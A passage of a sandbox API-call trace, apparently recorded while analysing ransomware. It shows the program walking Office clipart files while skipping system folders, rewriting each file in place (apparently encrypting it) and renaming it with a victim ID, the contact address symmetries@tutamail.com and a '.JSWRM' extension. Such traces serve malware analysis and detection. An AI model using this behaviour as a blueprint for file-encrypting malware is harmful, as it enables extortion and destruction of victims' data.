ftLastAccessTime.dwLowDateTime=0x11030b47, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11030b47, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20ee, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00673L.GIF", cAlternateFileName="")) returned 1 [0100.020] lstrcmpiW (lpString1="WB00673L.GIF", lpString2=".") returned 1 [0100.020] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="..") returned 1 [0100.020] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="...") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="windows") returned -1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="recovery") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="perflogs") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="documents and settings") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="system volume information") returned 1 [0100.021] lstrcmpiW (lpString1="WB00673L.GIF", lpString2="msocache") returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00673L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00673L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00673L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00673L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00673L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00673L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0100.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00673l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.022] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8430) returned 1 [0100.022] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e0) returned 0x24d210 [0100.022] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x20e0, lpOverlapped=0x0) returned 1 [0100.024] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.024] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x20e0, lpOverlapped=0x0) returned 1 [0100.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.024] CloseHandle (hObject=0x338) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0100.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0100.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.025] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00673l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00673l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0100.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.025] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00703L.GIF", cAlternateFileName="")) returned 1 [0100.025] lstrcmpiW (lpString1="WB00703L.GIF", lpString2=".") returned 1 [0100.025] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="..") returned 1 [0100.025] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="...") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="windows") returned -1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="recovery") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="perflogs") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="documents and settings") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="system volume information") returned 1 [0100.026] lstrcmpiW (lpString1="WB00703L.GIF", lpString2="msocache") returned 1 [0100.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00703L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00703L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00703L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00703L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00703L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00703L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00703l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.027] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8230) returned 1 [0100.027] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2020) returned 0x24d210 [0100.027] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x2020, lpOverlapped=0x0) returned 1 [0100.029] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.029] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x2020, lpOverlapped=0x0) returned 1 [0100.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.029] CloseHandle (hObject=0x338) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0100.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0100.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00703l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00703l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.031] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2313, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00760L.GIF", cAlternateFileName="")) returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2=".") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="..") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="...") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="windows") returned -1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="recovery") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="perflogs") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="documents and settings") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="system volume information") returned 1 [0100.031] lstrcmpiW (lpString1="WB00760L.GIF", lpString2="msocache") returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00760L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00760L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00760L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00760L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00760L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00760L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00760l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.032] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8979) returned 1 [0100.032] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2310) returned 0x24d210 [0100.032] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2310, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x2310, lpOverlapped=0x0) returned 1 [0100.034] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.034] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2310, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x2310, lpOverlapped=0x0) returned 1 [0100.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.034] CloseHandle (hObject=0x338) returned 1 [0100.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0100.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0100.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.035] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00760l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00760l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.035] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00780L.GIF", cAlternateFileName="")) returned 1 [0100.035] lstrcmpiW (lpString1="WB00780L.GIF", lpString2=".") returned 1 [0100.035] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="..") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="...") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="windows") returned -1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="recovery") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="perflogs") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="documents and settings") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="system volume information") returned 1 [0100.036] lstrcmpiW (lpString1="WB00780L.GIF", lpString2="msocache") returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00780L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00780L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00780L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 